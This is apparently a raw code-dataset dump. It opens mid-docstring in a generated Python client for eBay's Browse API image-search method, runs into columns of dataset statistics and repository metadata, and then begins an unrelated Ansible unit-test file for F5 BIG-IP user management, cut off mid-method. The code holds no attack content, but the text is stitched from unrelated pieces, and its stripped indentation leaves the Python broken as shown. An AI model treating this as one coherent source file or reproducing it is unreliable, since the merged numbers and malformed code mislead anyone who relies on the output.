in the <code>itemAffiliateWebUrl</code> field to forward your buyer to the ebay.com site. </span> # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_by_image_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param SearchByImageRequest body: The container for the image information fields.
:param str aspect_filter: This field lets you filter by item aspects. The aspect name/value pairs and category, which is required, is used to limit the results to specific aspects of the item. For example, in a clothing category one aspect pair would be Color/Red. <br /><br />For example, the method below uses the category ID for Women's Clothing. This will return only items for a woman's red shirt.<br /><br /><code>category_ids=15724&aspect_filter=categoryId:15724,Color:{Red}</code> <br /><br /><b>Required: </b> The category ID is required <i>twice</i>; once as a URI parameter and as part of the <b> aspect_filter</b>. For implementation help, refer to eBay API documentation at https://developer.ebay.com/api-docs/buy/browse/types/gct:AspectFilter
:param str category_ids: The category ID is used to limit the results. This field can have one category ID or a comma separated list of IDs. <br /><br /><span class=\"tablenote\"><b> Note: </b>Currently, you can pass in only one category ID per request.</span> <br /> <br />You can also use any combination of the <b> category_Ids</b> and <b> epid</b> fields. This gives you additional control over the result set.<br /> <br />The list of eBay category IDs is not published and category IDs are not the same across all the eBay marketplaces. You can use the following techniques to find a category by site: <ul> <li>Use the <a href=\"https://pages.ebay.com/sellerinformation/news/categorychanges.html\" target=\"_blank\">Category Changes page</a>.</li> <li>Use the Taxonomy API. For details see <a href=\"/api-docs/buy/buy-categories.html\">Get Categories for Buy APIs</a>. </li> <li>Submit the following method to get the <b> dominantCategoryId</b> for an item. <br /><code>/buy/browse/v1/item_summary/search?q=<em > keyword</em>&fieldgroups=ASPECT_REFINEMENTS </code></li></ul> <b> Required: </b> The method must have <b> category_ids</b> or <b> epid</b> (or any combination of these)
:param str charity_ids: The charity ID is used to limit the results to only items associated with the specified charity. This field can have one charity ID or a comma separated list of IDs. The method will return all the items associated with the specified charities.<br /><br /> <b>For example:</b><br /><code>/buy/browse/v1/item_summary/search?charity_ids=13-1788491,300108469</code><br /><br />The charity ID is the charity's registration ID, also known as the Employer Identification Number (EIN). In GB, it is the Charity Registration Number (CRN), commonly called \"Charity Number\". <ul><li>To find the charities eBay supports, you can search for a charity at <a href=\"https://charity.ebay.com/search\" target=\"_blank\">Charity Search </a> or go to <a href=\"https://www.ebay.com/b/Charity/bn_7114598164\" target=\"_blank\">Charity Shop</a>.</li> <li>To find the charity ID of a specific charity, click on a charity and use the EIN number. For example, the charity ID for <a href=\"https://charity.ebay.com/charity/American-Red-Cross/3843\" target=\"_blank\">American Red Cross</a>, is <code>530196605</code>.</li></ul> You can also use any combination of the <code>category_Ids</code> and <code>q</code> fields with a <code>charity_Ids</code> to filter the result set. This gives you additional control over the result set. <br /><br /><b>Restriction: </b> This is supported only on the US and GB marketplaces.<br /><br /><b>Maximum: </b> 20 IDs <br /><br /><b>Required:</b> One ID
:param str fieldgroups: This field is a comma separated list of values that lets you control what is returned in the response. The default is <b> MATCHING_ITEMS</b>, which returns the items that match the keyword or category specified. The other values return data that can be used to create histograms or provide additional information. <br /><br /><b> Valid Values: </b> <ul> <li><b> ASPECT_REFINEMENTS</b> - This returns the <a href=\"#response.refinement.aspectDistributions\">aspectDistributions</a> container, which has the <b> dominantCategoryId</b>, <b> matchCount</b>, and <b> refinementHref</b> for the various aspects of the items found. For example, if you searched for 'Mustang', some of the aspect would be <b> Model Year</b>, <b> Exterior Color</b>, <b> Vehicle Mileage</b>, etc. <br /> <br /><span class=\"tablenote\"> <b>Note: </b> ASPECT_REFINEMENTS are category specific.</span> <br /><br /></li> <li><b> BUYING_OPTION_REFINEMENTS</b> - This returns the <a href=\"#response.refinement.buyingOptionDistributions\">buyingOptionDistributions</a> container, which has the <b> matchCount</b> and <b> refinementHref</b> for <b> AUCTION</b> and <b> FIXED_PRICE</b> (Buy It Now) items. <br /><br /><span class=\"tablenote\"> <b>Note: </b>Classified items are not supported and only \"Buy It Now\" (non-auction) items are returned.</span> <br /><br /> </li> <li><b> CATEGORY_REFINEMENTS</b> - This returns the <a href=\"#response.refinement.categoryDistributions\">categoryDistributions</a> container, which has the categories that the item is in. </li> <li><b> CONDITION_REFINEMENTS</b> - This returns the <a href=\"#response.refinement.conditionDistributions\">conditionDistributions</a> container, such as <b> NEW</b>, <b> USED</b>, etc. Within these groups are multiple states of the condition. For example, <b> New </b> can be New without tag, New in box, New without box, etc. </li> <li><b> EXTENDED</b> - This returns the <a href=\"/api-docs/buy/browse/resources/item_summary/methods/search#response.itemSummaries.shortDescription\">shortDescription</a> field, which provides condition and item aspect information and the <a href=\"/api-docs/buy/browse/resources/item_summary/methods/search#response.itemSummaries.itemLocation.city\">itemLocation.city</a> field. </li> <li><b> MATCHING_ITEMS</b> - This is meant to be used with one or more of the refinement values above. You use this to return the specified refinements and all the matching items. </li> <li><b> FULL </b> - This returns all the refinement containers and all the matching items.</li> </ul> Code so that your app gracefully handles any future changes to this list. <br /><br /><b>Default: </b> MATCHING_ITEMS
:param str filter: This field supports multiple field filters that can be used to limit/customize the result set. <br /><br /><b> For example: </b><br /><code>/buy/browse/v1/item_summary/search?q=shirt&filter=price:[10..50]</code><br /><br />You can also combine filters. <br /><code>/buy/browse/v1/item_summary/search?q=shirt&filter=price:[10..50],sellers:{rpseller|bigSal} </code> <br /><br />The following are the supported filters. For details and examples for all the filters, see <a href=\"/api-docs/buy/static/ref-buy-browse-filters.html\">Buy API Field Filters</a>. <div style=\"overflow-x:auto;\"> <table> <tr> <td> <ul> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#bidCount\">bidCount</a> </li><li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#buyingOptions\">buyingOptions</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#charityOnly\">charityOnly</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#conditionIds\">conditionIds</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#conditions\">conditions</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#deliveryCountry\">deliveryCountry</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#deliveryOptions\">deliveryOptions</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#deliveryPostalCode\">deliveryPostalCode</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#excludeCategoryIds\">excludeCategoryIds</a> </li> </ul></td> <td> <ul> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#excludeSellers\">excludeSellers</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#guaranteedDeliveryInDays\">guaranteedDeliveryInDays</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#itemEndDate\">itemEndDate</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#itemLocationCountry\">itemLocationCountry</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#itemStartDate\">itemStartDate</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#maxDeliveryCost\">maxDeliveryCost</a></li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#paymentMethods\">paymentMethods</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#pickupCountry\">pickupCountry</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#pickupPostalCode\">pickupPostalCode</a> </li> </ul> </td> <td> <ul> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#pickupRadius\">pickupRadius</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#pickupRadiusUnit\">pickupRadiusUnit</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#price\">price</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#priceCurrency\">priceCurrency</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#qualifiedPrograms\">qualifiedPrograms</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#returnsAccepted\">returnsAccepted</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#sellerAccountTypes\">sellerAccountTypes</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#sellers\">sellers</a> </li> </ul></td> </tr> </table> </div> For implementation help, refer to eBay API documentation at https://developer.ebay.com/api-docs/buy/browse/types/cos:FilterField
:param str limit: The number of items, from the result set, returned in a single page. <br /><br /><b> Default:</b> 50 <br /> <br /><b> Maximum number of items per page (limit): </b>200 <br /> <br /> <b> Maximum number of items in a result set: </b> 10,000
:param str offset: The number of items to skip in the result set. This is used with the <b> limit</b> field to control the pagination of the output. <br /><br />If <b> offset</b> is 0 and <b> limit</b> is 10, the method will retrieve items 1-10 from the list of items returned, if <b> offset</b> is 10 and <b> limit</b> is 10, the method will retrieve items 11 thru 20 from the list of items returned. <br /><br /><b> Valid Values</b>: 0-10,000 (inclusive) <br /> <br /> <b> Default:</b> 0 <br /> <br /> <b> Maximum number of items returned: </b> 10,000
:param str sort: Specifies the order and the field name to use to sort the items. <br /><br />You can sort items by price (in ascending or descending order) or by distance (only applicable if the <a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#pickupCountry\">\"pickup\" filters</a> are used, and only ascending order is supported). You can also sort items by listing date, with the most recently listed (newest) items appearing first.<br /><br /><span class=\"tablenote\"><b>Note: </b> To sort in descending order, insert a hyphen (<code>-</code>) before the field name. If no <b>sort</b> parameter is submitted, the result set is sorted by "<a href=\"https://pages.ebay.com/help/sell/searchstanding.html\" target=\"_blank\">Best Match</a>".</span><br /><br />The following are examples of using the <b> sort</b> query parameter.<br /><br /><table><tr><th>Sort</th><th>Result</th> </tr> <tr> <td><code>sort=price</code></td> <td> Sorts by <b> price</b> in ascending order (lowest price first)</td> </tr> <tr> <td><code>sort=-price</code></td> <td> Sorts by <b> price</b> in descending order (highest price first)</td> </tr> <tr> <td><code>sort=distance</code></td> <td> Sorts by <b> distance</b> in ascending order (shortest distance first)</td> </tr> <tr> <td><code>sort=newlyListed</code></td> <td>Sorts by <b>listing date</b> (most recently listed/newest items first)</td> </tr> <tr> <td><code>sort=endingSoonest</code></td> <td>Sorts by <b>date/time</b> the listing ends (listings nearest to end date/time first)</td> </tr> </table> <br /><b> Default: </b> Ascending For implementation help, refer to eBay API documentation at https://developer.ebay.com/api-docs/buy/browse/types/cos:SortField
:return: SearchPagedCollection
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'aspect_filter', 'category_ids', 'charity_ids', 'fieldgroups', 'filter', 'limit', 'offset', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method search_by_image" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'aspect_filter' in params:
query_params.append(('aspect_filter', params['aspect_filter'])) # noqa: E501
if 'category_ids' in params:
query_params.append(('category_ids', params['category_ids'])) # noqa: E501
if 'charity_ids' in params:
query_params.append(('charity_ids', params['charity_ids'])) # noqa: E501
if 'fieldgroups' in params:
query_params.append(('fieldgroups', params['fieldgroups'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/item_summary/search_by_image', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SearchPagedCollection', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 241.360248
| 3,642
| 0.701974
| 6,059
| 38,859
| 4.462288
| 0.091929
| 0.019048
| 0.02737
| 0.031956
| 0.895292
| 0.886082
| 0.878648
| 0.872175
| 0.872175
| 0.872175
| 0
| 0.009908
| 0.145449
| 38,859
| 160
| 3,643
| 242.86875
| 0.804288
| 0.894465
| 0
| 0.026316
| 0
| 0
| 0.185294
| 0.034118
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039474
| false
| 0
| 0.052632
| 0
| 0.144737
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4a346d546f3ee7d17b3a889d2b79aa681f31da59
| 29,572
|
py
|
Python
|
venv/lib/python3.6/site-packages/ansible_collections/f5networks/f5_modules/tests/unit/modules/network/f5/test_bigip_user.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | 1
|
2020-01-22T13:11:23.000Z
|
2020-01-22T13:11:23.000Z
|
venv/lib/python3.6/site-packages/ansible_collections/f5networks/f5_modules/tests/unit/modules/network/f5/test_bigip_user.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | 12
|
2020-02-21T07:24:52.000Z
|
2020-04-14T09:54:32.000Z
|
venv/lib/python3.6/site-packages/ansible_collections/f5networks/f5_modules/tests/unit/modules/network/f5/test_bigip_user.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017 F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
import sys
if sys.version_info < (2, 7):
pytestmark = pytest.mark.skip("F5 Ansible modules require Python >= 2.7")
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.f5networks.f5_modules.plugins.modules.bigip_user import (
Parameters, ModuleManager, ArgumentSpec, UnpartitionedManager, PartitionedManager
)
from ansible_collections.f5networks.f5_modules.plugins.module_utils.common import F5ModuleError
from ansible_collections.f5networks.f5_modules.tests.unit.compat import unittest
from ansible_collections.f5networks.f5_modules.tests.unit.compat.mock import Mock, patch
from ansible_collections.f5networks.f5_modules.tests.unit.modules.utils import set_module_args
fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures')
fixture_data = {}
def load_fixture(name):
path = os.path.join(fixture_path, name)
if path in fixture_data:
return fixture_data[path]
with open(path) as f:
data = f.read()
try:
data = json.loads(data)
except Exception:
pass
fixture_data[path] = data
return data
class TestParameters(unittest.TestCase):
def test_module_parameters(self):
access = [{'name': 'Common', 'role': 'guest'}]
args = dict(
username_credential='someuser',
password_credential='testpass',
full_name='Fake Person',
partition_access=access,
update_password='always'
)
p = Parameters(params=args)
assert p.username_credential == 'someuser'
assert p.password_credential == 'testpass'
assert p.full_name == 'Fake Person'
assert p.partition_access == access
assert p.update_password == 'always'
def test_api_parameters(self):
access = [{'name': 'Common', 'role': 'guest'}]
args = dict(
name='someuser',
description='Fake Person',
partitionAccess=access,
shell='none'
)
p = Parameters(params=args)
assert p.name == 'someuser'
assert p.full_name == 'Fake Person'
assert p.partition_access == access
assert p.shell == 'none'
class TestManager(unittest.TestCase):
def setUp(self):
self.spec = ArgumentSpec()
self.p2 = patch('ansible_collections.f5networks.f5_modules.plugins.modules.bigip_user.tmos_version')
self.p3 = patch('ansible_collections.f5networks.f5_modules.plugins.modules.bigip_user.send_teem')
self.m2 = self.p2.start()
self.m2.return_value = '14.1.0'
self.m3 = self.p3.start()
self.m3.return_value = True
def tearDown(self):
self.p2.stop()
self.p3.stop()
def test_create_user(self, *args):
set_module_args(dict(
username_credential='someuser',
password_credential='testpass',
partition_access=['Common:guest'],
update_password='on_create',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
pm = PartitionedManager(module=module, params=module.params)
pm.create_on_device = Mock(return_value=True)
pm.exists = Mock(return_value=False)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=pm)
results = mm.exec_module()
assert results['changed'] is True
assert results['partition_access'] == ['Common:guest']
def test_create_user_no_password(self, *args):
set_module_args(dict(
username_credential='someuser',
partition_access=['Common:guest'],
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
pm = PartitionedManager(module=module, params=module.params)
pm.create_on_device = Mock(return_value=True)
pm.exists = Mock(return_value=False)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=pm)
results = mm.exec_module()
assert results['changed'] is True
assert results['partition_access'] == ['Common:guest']
def test_create_user_partition_access_raises(self, *args):
set_module_args(dict(
username_credential='someuser',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
pm = PartitionedManager(module=module, params=module.params)
pm.create_on_device = Mock(return_value=True)
pm.exists = Mock(return_value=False)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=pm)
msg = "The 'partition_access' option " \
"is required when creating a resource."
with pytest.raises(F5ModuleError) as ex:
mm.exec_module()
assert str(ex.value) == msg
def test_create_user_shell_bash(self, *args):
set_module_args(dict(
username_credential='someuser',
password_credential='testpass',
partition_access=['all:admin'],
update_password='on_create',
shell='bash',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
pm = PartitionedManager(module=module, params=module.params)
pm.create_on_device = Mock(return_value=True)
pm.exists = Mock(return_value=False)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=pm)
results = mm.exec_module()
assert results['changed'] is True
assert results['partition_access'] == ['all:admin']
def test_create_user_shell_not_permitted_raises(self, *args):
set_module_args(dict(
username_credential='someuser',
password_credential='testpass',
partition_access=['Common:guest'],
update_password='on_create',
shell='bash',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
pm = PartitionedManager(module=module, params=module.params)
pm.create_on_device = Mock(return_value=True)
pm.exists = Mock(return_value=False)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=pm)
msg = "Shell access is only available to 'admin' or " \
"'resource-admin' roles."
with pytest.raises(F5ModuleError) as ex:
mm.exec_module()
assert str(ex.value) == msg
def test_update_user_password_no_pass(self, *args):
set_module_args(dict(
username_credential='someuser',
password_credential='testpass',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Configure the parameters that would be returned by querying the
# remote device
current = Parameters(params=load_fixture('load_auth_user_no_pass.json'))
# Override methods to force specific logic in the module to happen
pm = PartitionedManager(module=module, params=module.params)
pm.exists = Mock(return_value=True)
pm.update_on_device = Mock(return_value=True)
pm.read_current_from_device = Mock(return_value=current)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=pm)
results = mm.exec_module()
assert results['changed'] is True
def test_update_user_password_with_pass(self, *args):
set_module_args(dict(
username_credential='someuser',
password_credential='testpass',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Configure the parameters that would be returned by querying the
# remote device
current = Parameters(params=load_fixture('load_auth_user_with_pass.json'))
# Override methods to force specific logic in the module to happen
pm = PartitionedManager(module=module, params=module.params)
pm.exists = Mock(return_value=True)
pm.update_on_device = Mock(return_value=True)
pm.read_current_from_device = Mock(return_value=current)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=pm)
results = mm.exec_module()
assert results['changed'] is True
def test_update_user_shell_to_none(self, *args):
set_module_args(dict(
username_credential='someuser',
shell='none',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Configure the parameters that would be returned by querying the
# remote device
current = Parameters(
params=dict(
user='admin',
shell='tmsh'
)
)
# Override methods to force specific logic in the module to happen
pm = PartitionedManager(module=module, params=module.params)
pm.exists = Mock(return_value=True)
pm.update_on_device = Mock(return_value=True)
pm.read_current_from_device = Mock(return_value=current)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=pm)
results = mm.exec_module()
assert results['changed'] is True
assert results['shell'] == 'none'
def test_update_user_shell_to_none_shell_attribute_missing(self, *args):
set_module_args(dict(
username_credential='someuser',
shell='none',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Configure the parameters that would be returned by querying the
# remote device
access = [{'name': 'Common', 'role': 'guest'}]
current = Parameters(
params=dict(
user='admin',
partition_access=access
)
)
# Override methods to force specific logic in the module to happen
pm = PartitionedManager(module=module, params=module.params)
pm.exists = Mock(return_value=True)
pm.update_on_device = Mock(return_value=True)
pm.read_current_from_device = Mock(return_value=current)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=pm)
results = mm.exec_module()
assert results['changed'] is False
assert not hasattr(results, 'shell')
def test_update_user_shell_to_bash(self, *args):
set_module_args(dict(
username_credential='someuser',
shell='bash',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Configure the parameters that would be returned by querying the
# remote device
access = [{'name': 'all', 'role': 'admin'}]
current = Parameters(
params=dict(
user='admin',
shell='tmsh',
partition_access=access
)
)
# Override methods to force specific logic in the module to happen
upm = UnpartitionedManager(module=module, params=module.params)
upm.exists = Mock(return_value=True)
upm.update_on_device = Mock(return_value=True)
upm.read_current_from_device = Mock(return_value=current)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=True)
mm.get_manager = Mock(return_value=upm)
results = mm.exec_module()
assert results['changed'] is True
assert results['shell'] == 'bash'
def test_update_user_shell_to_bash_mutliple_roles(self, *args):
set_module_args(dict(
username_credential='someuser',
shell='bash',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Configure the parameters that would be returned by querying the
# remote device
access = [
{'name': 'Common', 'role': 'operator'},
{'name': 'all', 'role': 'guest'}
]
current = Parameters(
params=dict(
user='admin',
shell='tmsh',
partition_access=access
)
)
# Override methods to force specific logic in the module to happen
upm = UnpartitionedManager(module=module, params=module.params)
upm.exists = Mock(return_value=True)
upm.update_on_device = Mock(return_value=True)
upm.read_current_from_device = Mock(return_value=current)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=True)
mm.get_manager = Mock(return_value=upm)
msg = "Shell access is only available to 'admin' or " \
"'resource-admin' roles."
with pytest.raises(F5ModuleError) as ex:
mm.exec_module()
assert str(ex.value) == msg
class TestLegacyManager(unittest.TestCase):
def setUp(self):
self.spec = ArgumentSpec()
self.p2 = patch('ansible_collections.f5networks.f5_modules.plugins.modules.bigip_user.tmos_version')
self.p3 = patch('ansible_collections.f5networks.f5_modules.plugins.modules.bigip_user.send_teem')
self.m2 = self.p2.start()
self.m2.return_value = '14.1.0'
self.m3 = self.p3.start()
self.m3.return_value = True
def tearDown(self):
self.p2.stop()
self.p3.stop()
def test_create_user(self, *args):
set_module_args(dict(
username_credential='someuser',
password_credential='testpass',
partition_access=['Common:guest'],
update_password='on_create',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
upm = UnpartitionedManager(module=module, params=module.params)
upm.create_on_device = Mock(return_value=True)
upm.exists = Mock(return_value=False)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=True)
mm.get_manager = Mock(return_value=upm)
results = mm.exec_module()
assert results['changed'] is True
assert results['partition_access'] == ['Common:guest']
def test_create_user_no_password(self, *args):
set_module_args(dict(
username_credential='someuser',
partition_access=['Common:guest'],
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
upm = UnpartitionedManager(module=module, params=module.params)
upm.create_on_device = Mock(return_value=True)
upm.exists = Mock(return_value=False)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=True)
mm.get_manager = Mock(return_value=upm)
results = mm.exec_module()
assert results['changed'] is True
assert results['partition_access'] == ['Common:guest']
def test_create_user_partition_access_raises(self, *args):
set_module_args(dict(
username_credential='someuser',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
upm = UnpartitionedManager(module=module, params=module.params)
upm.create_on_device = Mock(return_value=True)
upm.exists = Mock(return_value=False)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=True)
mm.get_manager = Mock(return_value=upm)
msg = "The 'partition_access' option " \
"is required when creating a resource."
with pytest.raises(F5ModuleError) as ex:
mm.exec_module()
assert str(ex.value) == msg
def test_create_user_shell_bash(self, *args):
set_module_args(dict(
username_credential='someuser',
password_credential='testpass',
partition_access=['all:admin'],
update_password='on_create',
shell='bash',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
upm = UnpartitionedManager(module=module, params=module.params)
upm.create_on_device = Mock(return_value=True)
upm.exists = Mock(return_value=False)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=True)
mm.get_manager = Mock(return_value=upm)
results = mm.exec_module()
assert results['changed'] is True
assert results['partition_access'] == ['all:admin']
def test_create_user_shell_not_permitted_raises(self, *args):
set_module_args(dict(
username_credential='someuser',
password_credential='testpass',
partition_access=['Common:guest'],
update_password='on_create',
shell='bash',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
upm = UnpartitionedManager(module=module, params=module.params)
upm.create_on_device = Mock(return_value=True)
upm.exists = Mock(return_value=False)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=True)
mm.get_manager = Mock(return_value=upm)
msg = "Shell access is only available to 'admin' or " \
"'resource-admin' roles."
with pytest.raises(F5ModuleError) as ex:
mm.exec_module()
assert str(ex.value) == msg
def test_update_user_password(self, *args):
set_module_args(dict(
username_credential='someuser',
password_credential='testpass',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Configure the parameters that would be returned by querying the
# remote device
access = [{'name': 'Common', 'role': 'guest'}]
current = Parameters(
params=dict(
shell='tmsh',
partition_access=access
)
)
# Override methods to force specific logic in the module to happen
upm = UnpartitionedManager(module=module, params=module.params)
upm.exists = Mock(return_value=True)
upm.update_on_device = Mock(return_value=True)
upm.read_current_from_device = Mock(return_value=current)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=True)
mm.get_manager = Mock(return_value=upm)
results = mm.exec_module()
assert results['changed'] is True
def test_update_user_shell_to_none(self, *args):
set_module_args(dict(
username_credential='someuser',
shell='none',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Configure the parameters that would be returned by querying the
# remote device
current = Parameters(
params=dict(
user='admin',
shell='tmsh'
)
)
# Override methods to force specific logic in the module to happen
upm = UnpartitionedManager(module=module, params=module.params)
upm.exists = Mock(return_value=True)
upm.update_on_device = Mock(return_value=True)
upm.read_current_from_device = Mock(return_value=current)
mm = ModuleManager(module=module)
